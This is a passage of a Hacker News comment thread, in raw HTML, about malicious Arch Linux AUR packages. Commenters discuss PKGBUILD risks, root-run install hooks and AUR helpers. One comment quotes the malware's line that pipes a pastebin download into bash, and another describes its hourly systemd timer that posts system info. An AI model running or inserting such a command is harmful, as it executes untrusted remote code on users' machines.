                  <span class="commtext c00">No, AUR packages are PKGBUILD files, which are essentially little batch scripts that run inside a fakeroot.<p>IMHO, the danger of a PKGBUILD <i>itself</i> doing something nasty is small--it would be limited to things like recording `uname -a`, listing all your installed packages: the things mentioned in the article.<p>The real danger is that the PKGBUILD is installing some software, which you will later run with full user privileges.  If you don&#x27;t notice that the Git repo listed in the PKGBUILD file is wrong, you won&#x27;t notice that you&#x27;re actually installing a backdoored version of the package.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                <tr class='athing comtr' id='17502795'><td><table border='0'>  <tr>    <td class='ind' indent='3'><img src="s.gif" height="1" width="120"></td><td valign="top" class="votelinks">
      <center><a id='up_17502795'href='vote?id=17502795&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=dbrgn" class="hnuser">dbrgn</a> <span class="age" title="2018-07-10T22:32:49"><a href="item?id=17502795">on July 10, 2018</a></span> <span id="unv_17502795"></span>          <span class='navs'>
             | <a href="#17501464" class="clicky" aria-hidden="true">root</a> | <a href="#17502378" class="clicky" aria-hidden="true">parent</a> | <a href="#17502388" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17502795" n="2" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">The PKBUILD runs in the fakeroot, but AFAIK the .install files (postinstall hooks etc) run on the host system directly, with root permission. Definitely something you will always want to review.<p>(Also, I don&#x27;t really get the critique of tools like yaourt, since they make it easy to inspect the PKGBUILD and - if present - install files. The tool simplifies downloading, you still need to review yourself!)</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                <tr class='athing comtr' id='17508837'><td><table border='0'>  <tr>    <td class='ind' indent='4'><img src="s.gif" height="1" width="160"></td><td valign="top" class="votelinks">
      <center><a id='up_17508837'href='vote?id=17508837&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=xiii1408" class="hnuser">xiii1408</a> <span class="age" title="2018-07-11T17:50:30"><a href="item?id=17508837">on July 11, 2018</a></span> <span id="unv_17508837"></span>          <span class='navs'>
             | <a href="#17501464" class="clicky" aria-hidden="true">root</a> | <a href="#17502795" class="clicky" aria-hidden="true">parent</a> | <a href="#17502388" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17508837" n="1" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">All the install hooks are run chrooted inside the pacman install directory.<p>But, yeah, they run as root, so they could still do something nasty at install time.  Not when you `makepkg` the PKGBUILD, though.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                        <tr class='athing comtr' id='17502388'><td><table border='0'>  <tr>    <td class='ind' indent='2'><img src="s.gif" height="1" width="80"></td><td valign="top" class="votelinks">
      <center><a id='up_17502388'href='vote?id=17502388&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=vertex-four" class="hnuser">vertex-four</a> <span class="age" title="2018-07-10T21:33:33"><a href="item?id=17502388">on July 10, 2018</a></span> <span id="unv_17502388"></span>          <span class='navs'>
             | <a href="#17501464" class="clicky" aria-hidden="true">root</a> | <a href="#17502310" class="clicky" aria-hidden="true">parent</a> | <a href="#17502378" class="clicky" aria-hidden="true">prev</a> | <a href="#17501895" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17502388" n="1" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">The AUR repo is, basically, a free for all. It’s not the official repository, which is trustworthy - it’s just a hosting space for user-provided build instructions.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                        <tr class='athing comtr' id='17501895'><td><table border='0'>  <tr>    <td class='ind' indent='0'><img src="s.gif" height="1" width="0"></td><td valign="top" class="votelinks">
      <center><a id='up_17501895'href='vote?id=17501895&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=pandasun" class="hnuser">pandasun</a> <span class="age" title="2018-07-10T20:35:10"><a href="item?id=17501895">on July 10, 2018</a></span> <span id="unv_17501895"></span>          <span class='navs'>
             | <a href="#17501464" class="clicky" aria-hidden="true">prev</a> | <a href="#17502536" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17501895" n="3" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">The article mentions 3 infected packages. But it only lists one: acroread.<p>Then the comment section mentions the other one is libvlc.<p>But the mailing list says this is something different: <a href="https:&#x2F;&#x2F;lists.archlinux.org&#x2F;pipermail&#x2F;aur-general&#x2F;2018-July&#x2F;034158.html" rel="nofollow">https:&#x2F;&#x2F;lists.archlinux.org&#x2F;pipermail&#x2F;aur-general&#x2F;2018-July&#x2F;...</a><p>So then there&#x27;s still two missing.<p>Here&#x27;s what I&#x27;ve found that he maintained:<p>1) balz (<a href="https:&#x2F;&#x2F;archive.fo&#x2F;TjIQI" rel="nofollow">https:&#x2F;&#x2F;archive.fo&#x2F;TjIQI</a>)<p>2) minergate (<a href="https:&#x2F;&#x2F;archive.fo&#x2F;TjIQI" rel="nofollow">https:&#x2F;&#x2F;archive.fo&#x2F;TjIQI</a>)<p>3) acroread - as mentioned (<a href="https:&#x2F;&#x2F;my.mixtape.moe&#x2F;kvfpmk.png" rel="nofollow">https:&#x2F;&#x2F;my.mixtape.moe&#x2F;kvfpmk.png</a>)<p>So those &quot;balz&quot; and &quot;minergate&quot; could be the missing two.<p>Edit: seems like archive.fo is temporarily down, so it will just be my word for it right now. Sorry.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                <tr class='athing comtr' id='17503309'><td><table border='0'>  <tr>    <td class='ind' indent='1'><img src="s.gif" height="1" width="40"></td><td valign="top" class="votelinks">
      <center><a id='up_17503309'href='vote?id=17503309&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=Foxboron" class="hnuser">Foxboron</a> <span class="age" title="2018-07-11T00:00:18"><a href="item?id=17503309">on July 11, 2018</a></span> <span id="unv_17503309"></span>          <span class='navs'>
             | <a href="#17501895" class="clicky" aria-hidden="true">parent</a> | <a href="#17501916" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17503309" n="1" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">There was some more questions about the affected packages on IRC. I posted a mail to the thread with the packages and versions.
<a href="https:&#x2F;&#x2F;lists.archlinux.org&#x2F;pipermail&#x2F;aur-general&#x2F;2018-July&#x2F;034169.html" rel="nofollow">https:&#x2F;&#x2F;lists.archlinux.org&#x2F;pipermail&#x2F;aur-general&#x2F;2018-July&#x2F;...</a></span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
            <tr class='athing comtr' id='17501916'><td><table border='0'>  <tr>    <td class='ind' indent='1'><img src="s.gif" height="1" width="40"></td><td valign="top" class="votelinks">
      <center><a id='up_17501916'href='vote?id=17501916&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=Foxboron" class="hnuser">Foxboron</a> <span class="age" title="2018-07-10T20:37:31"><a href="item?id=17501916">on July 10, 2018</a></span> <span id="unv_17501916"></span>          <span class='navs'>
             | <a href="#17501895" class="clicky" aria-hidden="true">parent</a> | <a href="#17503309" class="clicky" aria-hidden="true">prev</a> | <a href="#17502536" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17501916" n="1" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">Someone was questioning if `libvlc` could be considered dangerous. However the package download our packaged `vlc` packages and just repackages the `&#x2F;usr&#x2F;lib&#x2F;libvlc*` files into a new package.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                  <tr class='athing comtr' id='17502536'><td><table border='0'>  <tr>    <td class='ind' indent='0'><img src="s.gif" height="1" width="0"></td><td valign="top" class="votelinks">
      <center><a id='up_17502536'href='vote?id=17502536&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=Tharre" class="hnuser">Tharre</a> <span class="age" title="2018-07-10T21:53:07"><a href="item?id=17502536">on July 10, 2018</a></span> <span id="unv_17502536"></span>          <span class='navs'>
             | <a href="#17501895" class="clicky" aria-hidden="true">prev</a> | <a href="#17501913" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17502536" n="5" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">For the people interested, here&#x27;s the actual commit from the acroread package:<p><a href="https:&#x2F;&#x2F;aur.archlinux.org&#x2F;cgit&#x2F;aur.git&#x2F;commit&#x2F;?h=acroread&amp;id=b3fec9f2f16703c2dae9e793f75ad6e0d98509bc" rel="nofollow">https:&#x2F;&#x2F;aur.archlinux.org&#x2F;cgit&#x2F;aur.git&#x2F;commit&#x2F;?h=acroread&amp;id...</a></span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                <tr class='athing comtr' id='17502685'><td><table border='0'>  <tr>    <td class='ind' indent='1'><img src="s.gif" height="1" width="40"></td><td valign="top" class="votelinks">
      <center><a id='up_17502685'href='vote?id=17502685&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=kevincox" class="hnuser">kevincox</a> <span class="age" title="2018-07-10T22:15:23"><a href="item?id=17502685">on July 10, 2018</a></span> <span id="unv_17502685"></span>          <span class='navs'>
             | <a href="#17502536" class="clicky" aria-hidden="true">parent</a> | <a href="#17503172" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17502685" n="1" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">Following the URLs it appears that it sets up a systemd timer to post some system info to pastebin every hour. However the script also appears to have a mistake which I think would cause it to only log to &#x2F;root&#x2F;home&#x2F;*&#x2F;compromised.txt.<p>$uploader &quot;$FULL_LOG&quot;<p>should be<p>upload &quot;$FULL_LOG&quot;</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
            <tr class='athing comtr' id='17503172'><td><table border='0'>  <tr>    <td class='ind' indent='1'><img src="s.gif" height="1" width="40"></td><td valign="top" class="votelinks">
      <center><a id='up_17503172'href='vote?id=17503172&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=dmix" class="hnuser">dmix</a> <span class="age" title="2018-07-10T23:40:04"><a href="item?id=17503172">on July 10, 2018</a></span> <span id="unv_17503172"></span>          <span class='navs'>
             | <a href="#17502536" class="clicky" aria-hidden="true">parent</a> | <a href="#17502685" class="clicky" aria-hidden="true">prev</a> | <a href="#17501913" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17503172" n="3" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">&gt; +    curl -s <a href="https:&#x2F;&#x2F;ptpb.pw&#x2F;~x|bash" rel="nofollow">https:&#x2F;&#x2F;ptpb.pw&#x2F;~x|bash</a> -&amp;<p>So much for being sneaky malware, he wasn&#x27;t even trying to hide it... Any insertion of a `curl` command to some shady looking TLD piping to bash is going to be a massive red flag to even unsophisticated linux users.<p>Not much to see here, fortunately.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                <tr class='athing comtr' id='17503362'><td><table border='0'>  <tr>    <td class='ind' indent='2'><img src="s.gif" height="1" width="80"></td><td valign="top" class="votelinks">
      <center><a id='up_17503362'href='vote?id=17503362&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=0xb100db1ade" class="hnuser">0xb100db1ade</a> <span class="age" title="2018-07-11T00:12:12"><a href="item?id=17503362">on July 11, 2018</a></span> <span id="unv_17503362"></span>          <span class='navs'>
             | <a href="#17502536" class="clicky" aria-hidden="true">root</a> | <a href="#17503172" class="clicky" aria-hidden="true">parent</a> | <a href="#17501913" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17503362" n="2" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">that &quot;shady&quot; domain is the official pastebin for freenode&#x27;s Arch Linux IRC channel</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                <tr class='athing comtr' id='17503908'><td><table border='0'>  <tr>    <td class='ind' indent='3'><img src="s.gif" height="1" width="120"></td><td valign="top" class="votelinks">
      <center><a id='up_17503908'href='vote?id=17503908&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=earenndil" class="hnuser">earenndil</a> <span class="age" title="2018-07-11T02:09:18"><a href="item?id=17503908">on July 11, 2018</a></span> <span id="unv_17503908"></span>          <span class='navs'>
             | <a href="#17502536" class="clicky" aria-hidden="true">root</a> | <a href="#17503362" class="clicky" aria-hidden="true">parent</a> | <a href="#17501913" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17503908" n="1" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">Even moreso: the fact that it&#x27;s well-known as a pastebin means that it should be obvious data coming from it are user-generated and could come from anyone.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                              <tr class='athing comtr' id='17501913'><td><table border='0'>  <tr>    <td class='ind' indent='0'><img src="s.gif" height="1" width="0"></td><td valign="top" class="votelinks">
      <center><a id='up_17501913'href='vote?id=17501913&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=westmeal" class="hnuser">westmeal</a> <span class="age" title="2018-07-10T20:36:57"><a href="item?id=17501913">on July 10, 2018</a></span> <span id="unv_17501913"></span>          <span class='navs'>
             | <a href="#17502536" class="clicky" aria-hidden="true">prev</a> | <a href="#17501983" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17501913" n="9" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">Doesnt everyone know AUR packages are inherently unsafe? if you wanted to make sure they werent up to something you could read the pkgbuild</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                <tr class='athing comtr' id='17502542'><td><table border='0'>  <tr>    <td class='ind' indent='1'><img src="s.gif" height="1" width="40"></td><td valign="top" class="votelinks">
      <center><a id='up_17502542'href='vote?id=17502542&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=Skunkleton" class="hnuser">Skunkleton</a> <span class="age" title="2018-07-10T21:53:58"><a href="item?id=17502542">on July 10, 2018</a></span> <span id="unv_17502542"></span>          <span class='navs'>
             | <a href="#17501913" class="clicky" aria-hidden="true">parent</a> | <a href="#17507817" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17502542" n="7" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">Given the design of most of the AUR &quot;helpers&quot; out there, I would guess that there are a non-trivial amount of users who view the AUR as safe.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                <tr class='athing comtr' id='17502803'><td><table border='0'>  <tr>    <td class='ind' indent='2'><img src="s.gif" height="1" width="80"></td><td valign="top" class="votelinks">
      <center><a id='up_17502803'href='vote?id=17502803&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=dbrgn" class="hnuser">dbrgn</a> <span class="age" title="2018-07-10T22:35:09"><a href="item?id=17502803">on July 10, 2018</a></span> <span id="unv_17502803"></span>          <span class='navs'>
             | <a href="#17501913" class="clicky" aria-hidden="true">root</a> | <a href="#17502542" class="clicky" aria-hidden="true">parent</a> | <a href="#17507817" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17502803" n="6" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">Yaourt shows a big fat red warning every time you install a package. It also offers to open PKGBUILD and .install files for inspection.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                <tr class='athing comtr' id='17503849'><td><table border='0'>  <tr>    <td class='ind' indent='3'><img src="s.gif" height="1" width="120"></td><td valign="top" class="votelinks">
      <center><a id='up_17503849'href='vote?id=17503849&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=d4l3k" class="hnuser">d4l3k</a> <span class="age" title="2018-07-11T01:55:23"><a href="item?id=17503849">on July 11, 2018</a></span> <span id="unv_17503849"></span>          <span class='navs'>
             | <a href="#17501913" class="clicky" aria-hidden="true">root</a> | <a href="#17502803" class="clicky" aria-hidden="true">parent</a> | <a href="#17502974" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17503849" n="2" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">Yaourt is also unmaintained and unsafe. Please switch to something better.<p><a href="https:&#x2F;&#x2F;wiki.archlinux.org&#x2F;index.php&#x2F;AUR_helpers#Active" rel="nofollow">https:&#x2F;&#x2F;wiki.archlinux.org&#x2F;index.php&#x2F;AUR_helpers#Active</a></span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                <tr class='athing comtr' id='17505126'><td><table border='0'>  <tr>    <td class='ind' indent='4'><img src="s.gif" height="1" width="160"></td><td valign="top" class="votelinks">
      <center><a id='up_17505126'href='vote?id=17505126&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=dbrgn" class="hnuser">dbrgn</a> <span class="age" title="2018-07-11T07:44:38"><a href="item?id=17505126">on July 11, 2018</a></span> <span id="unv_17505126"></span>          <span class='navs'>
             | <a href="#17501913" class="clicky" aria-hidden="true">root</a> | <a href="#17503849" class="clicky" aria-hidden="true">parent</a> | <a href="#17502974" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17505126" n="1" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">Oh wow. I was not aware, thanks for letting me know!</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                  <tr class='athing comtr' id='17502974'><td><table border='0'>  <tr>    <td class='ind' indent='3'><img src="s.gif" height="1" width="120"></td><td valign="top" class="votelinks">
      <center><a id='up_17502974'href='vote?id=17502974&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=imtringued" class="hnuser">imtringued</a> <span class="age" title="2018-07-10T23:06:44"><a href="item?id=17502974">on July 10, 2018</a></span> <span id="unv_17502974"></span>          <span class='navs'>
             | <a href="#17501913" class="clicky" aria-hidden="true">root</a> | <a href="#17502803" class="clicky" aria-hidden="true">parent</a> | <a href="#17503849" class="clicky" aria-hidden="true">prev</a> | <a href="#17507817" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17502974" n="3" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">It should just show the PKGBUILD every time. If it&#x27;s not doing anything sketchy it&#x27;s often only a dozen lines.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                <tr class='athing comtr' id='17503168'><td><table border='0'>  <tr>    <td class='ind' indent='4'><img src="s.gif" height="1" width="160"></td><td valign="top" class="votelinks">
      <center><a id='up_17503168'href='vote?id=17503168&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=Skunkleton" class="hnuser">Skunkleton</a> <span class="age" title="2018-07-10T23:39:30"><a href="item?id=17503168">on July 10, 2018</a></span> <span id="unv_17503168"></span>          <span class='navs'>
             | <a href="#17501913" class="clicky" aria-hidden="true">root</a> | <a href="#17502974" class="clicky" aria-hidden="true">parent</a> | <a href="#17507817" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17503168" n="2" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">aurman does a good job. It caches the old PKGBUILD and lets you view diffs. Still, reviewing a PKGBUILD is a non-trivial process.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                <tr class='athing comtr' id='17503273'><td><table border='0'>  <tr>    <td class='ind' indent='5'><img src="s.gif" height="1" width="200"></td><td valign="top" class="votelinks">
      <center><a id='up_17503273'href='vote?id=17503273&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=ronjouch" class="hnuser">ronjouch</a> <span class="age" title="2018-07-10T23:54:28"><a href="item?id=17503273">on July 10, 2018</a></span> <span id="unv_17503273"></span>          <span class='navs'>
             | <a href="#17501913" class="clicky" aria-hidden="true">root</a> | <a href="#17503168" class="clicky" aria-hidden="true">parent</a> | <a href="#17507817" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17503273" n="1" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">Thanks! I got bored of looking for a yaourt replacement because they seemed all the same, and discussions of AUR helpers often turn into flamewars, but PKGBUILD diffs is a valuable feature. Trying aurman :)</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                                    <tr class='athing comtr' id='17507817'><td><table border='0'>  <tr>    <td class='ind' indent='1'><img src="s.gif" height="1" width="40"></td><td valign="top" class="votelinks">
      <center><a id='up_17507817'href='vote?id=17507817&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=ilikehurdles" class="hnuser">ilikehurdles</a> <span class="age" title="2018-07-11T15:47:51"><a href="item?id=17507817">on July 11, 2018</a></span> <span id="unv_17507817"></span>          <span class='navs'>
             | <a href="#17501913" class="clicky" aria-hidden="true">parent</a> | <a href="#17502542" class="clicky" aria-hidden="true">prev</a> | <a href="#17501983" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17507817" n="1" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">Honestly, no, not everyone knows this. Maybe when there was just arch linux and no spinoffs; but manjaro provides an easy path to a rolling-release arch(-like) distribution, and it treats AUR as a first-class citizen in its GUIs. I think there was a popup at some point when an application first accesses AUR that tells you that AUR is unsupported and to go to a wiki to understand it, but I think it could use better messaging. A warning at the header of the AUR section of the package manager gui would be a good start.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                  <tr class='athing comtr' id='17501983'><td><table border='0'>  <tr>    <td class='ind' indent='0'><img src="s.gif" height="1" width="0"></td><td valign="top" class="votelinks">
      <center><a id='up_17501983'href='vote?id=17501983&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=Aardwolf" class="hnuser">Aardwolf</a> <span class="age" title="2018-07-10T20:44:26"><a href="item?id=17501983">on July 10, 2018</a></span> <span id="unv_17501983"></span>          <span class='navs'>
             | <a href="#17501913" class="clicky" aria-hidden="true">prev</a> | <a href="#17501939" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17501983" n="18" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">Unfortunately lots of things one actually wants are on AUR, things like jpeginfo, golly, steam-fonts, simple-mtpfs, jslint, ...<p>A case for putting more things in the main Archlinux repositories!</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                <tr class='athing comtr' id='17502307'><td><table border='0'>  <tr>    <td class='ind' indent='1'><img src="s.gif" height="1" width="40"></td><td valign="top" class="votelinks">
      <center><a id='up_17502307'href='vote?id=17502307&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=xiii1408" class="hnuser">xiii1408</a> <span class="age" title="2018-07-10T21:22:24"><a href="item?id=17502307">on July 10, 2018</a></span> <span id="unv_17502307"></span>          <span class='navs'>
             | <a href="#17501983" class="clicky" aria-hidden="true">parent</a> | <a href="#17502445" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17502307" n="7" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">My understanding is some things (e.g. Google Chrome, Google and Microsoft fonts) can&#x27;t be put in the main Arch Linux repos for copyright reasons.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                <tr class='athing comtr' id='17503426'><td><table border='0'>  <tr>    <td class='ind' indent='2'><img src="s.gif" height="1" width="80"></td><td valign="top" class="votelinks">
      <center><a id='up_17503426'href='vote?id=17503426&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=bscphil" class="hnuser">bscphil</a> <span class="age" title="2018-07-11T00:25:53"><a href="item?id=17503426">on July 11, 2018</a></span> <span id="unv_17503426"></span>          <span class='navs'>
             | <a href="#17501983" class="clicky" aria-hidden="true">root</a> | <a href="#17502307" class="clicky" aria-hidden="true">parent</a> | <a href="#17502411" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17503426" n="2" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
                  <span class="commtext c00">Chromium and Google&#x27;s Roboto and Noto fonts are all in the official repos.</span>
              <div class='reply'>        <p><font size="1">
                  </font>
      </div></div></td></tr>
        </table></td></tr>
                <tr class='athing comtr' id='17508730'><td><table border='0'>  <tr>    <td class='ind' indent='3'><img src="s.gif" height="1" width="120"></td><td valign="top" class="votelinks">
      <center><a id='up_17508730'href='vote?id=17508730&amp;how=up&amp;goto=item%3Fid%3D17501379'><div class='votearrow' title='upvote'></div></a></center>    </td><td class="default"><div style="margin-top:2px; margin-bottom:-10px;"><span class="comhead">
          <a href="user?id=xiii1408" class="hnuser">xiii1408</a> <span class="age" title="2018-07-11T17:37:32"><a href="item?id=17508730">on July 11, 2018</a></span> <span id="unv_17508730"></span>          <span class='navs'>
             | <a href="#17501983" class="clicky" aria-hidden="true">root</a> | <a href="#17503426" class="clicky" aria-hidden="true">parent</a> | <a href="#17502411" class="clicky" aria-hidden="true">next</a> <a class="togg clicky" id="17508730" n="1" href="javascript:void(0)">[–]</a><span class="onstory"></span>          </span>
                  </span></div><br><div class="comment">
